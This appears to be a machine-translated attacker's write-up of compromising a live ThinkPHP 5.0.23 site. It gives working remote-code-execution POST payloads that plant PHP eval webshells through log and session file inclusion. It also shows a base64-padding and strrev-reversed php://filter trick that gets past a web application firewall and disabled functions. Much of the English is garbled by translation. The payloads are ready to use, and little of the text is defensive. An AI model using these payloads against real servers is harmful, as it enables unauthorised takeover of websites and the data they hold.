0x00 Foreword
Friend before the stations, took a long time and finally won, simply record it.
0x01 basic information
Vulnerability point: tp 5 method of code execution, payload follows
POST /?s=captcha _method=__construct&method=get&filter[]=assert&server[]=1&get[]=1No echo, according to judge the success of the target payload thinkphp version should be 5.0.23
There waf, waf blocked following
php标记: <?php <?= <? php 函数: base64_decode file_get_contents convert_uuencode 关键字: php://linux
The following functions are disabled disable_function
passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_serverphp 7.1.7 (although the
assertfunction is not disable_function but has been unable to usecall_user_functhe callback is invoked)
0x02 breakthrough
Now tp 5 method of code to perform some ideas developed, nothing more than the following two:
1, write the log, the log contains getshell. payload as follows:
写shell进日志
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['x'])?>
通过日志包含getshell
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../data/runtime/log/201901/21.log&x=phpinfo();2, write session, contains session getshell. payload as follows:
写shell进session
POST /?s=captcha HTTP/1.1
Cookie: PHPSESSID=kking
_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1
包含session getshell
POST /?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&get[]=tmp\sess_kking&server[]=1And these two methods are not available here, because waf for <?phpkeywords such as the interception, there are other ways?
base64 encoding php: // filter pseudo-protocol
If it can be deformed like a keyword or encoding, such as base64 encoding:
If our session file /tmp/sess_kking, reads as follows
PD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8+
<?php @eval($_GET['r']);;?>Because the final use by inlcudeconduct that contains the method is actually very easy to think you can take advantage of php://filter/read=convert.base64-decode/resource=/tmp/sess_kkingthe way to decode
The final execution similar to the following:
include('php://filter/read=convert.base64-decode/resource=/tmp/sess_kking');But the session there will be other characters
How to make php://filterthe right decode it?
So here, too, as long as we construct the appropriate character, so that we can correct the webshell can be base64 decoded.
Local test
The first step, setting session
POST /?s=captcha
_method=__construct&filter[]=think\Session::set&method=get&get[]=adPD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8%2bab&server[]=1(Note: This number needed + urlencodeencoded% 2b, write or will sessionbe spaces urldecode time, resulting in failure codec).
Point 1 question: Why not PD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Pz4= (<?php @eval($_GET['r']);?>)instead PD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8+ (<?php @eval($_GET['r']);;?>)of it,
A: Yes, because no matter how directly the former patchwork character, no law correctly decoded.
Point 2 questions: Why is payloadaround there will be two ab?
A: Yes, in order to allow shell payloadthe two strings before and after the string meet base64 decoded length, so that it can properly decode.
The second step includes the successful implementation of the code:
Local test case, but you could not find the target test execution, because our payload using php://filterthe protocol contains the php://keyword
How to make keyword is not allowed to do?
Details tp 5 method of code execution
Let us carefully observe the code execution Request.phpis filterValuehow the method is executing code.
We note that filteractually can pass multiple, while the parameters for the parameter reference.
So in fact, we can deliver more filtercome to the right valueto make multiple passes treatment. The first base64_decodepassed to the decoded value will includebe contained.
But this waf online is base64_decodethe function of the filter, tested found to be using strrevthe inverse function breakthrough. Taking into account waf problem, we use shell payloadCadogan layer of base64 encoding.
Similarly here, why should a few more payload semicolon do not need to explain
Back to our getshellstep, executed on the target
1. Set session:
POST /?s=captcha
Cookie: PHPSESSID=kktest
_method=__construct&filter[]=think\Session::set&method=get&get[]=abPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX0dFVFsnciddKSk7Oz8%2bab&server[]=1
( payloadBoth before and after abthe same is to base64decode the reason Minato characters)
2, the file containing
POST /?s=captcha&r=cGhwaW5mbygpOw==
_method=__construct&filter[]=strrev&filter[]=think\__include_file&method=get&server[]=1&get[]=tsetkk_sses/pmt/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php
The ultimate success to bypass the firewall getshell.
0x03 summary
Overall very interesting, also spent several nights, the ultimate success getshellis very cool. (Fortunately did not give up :)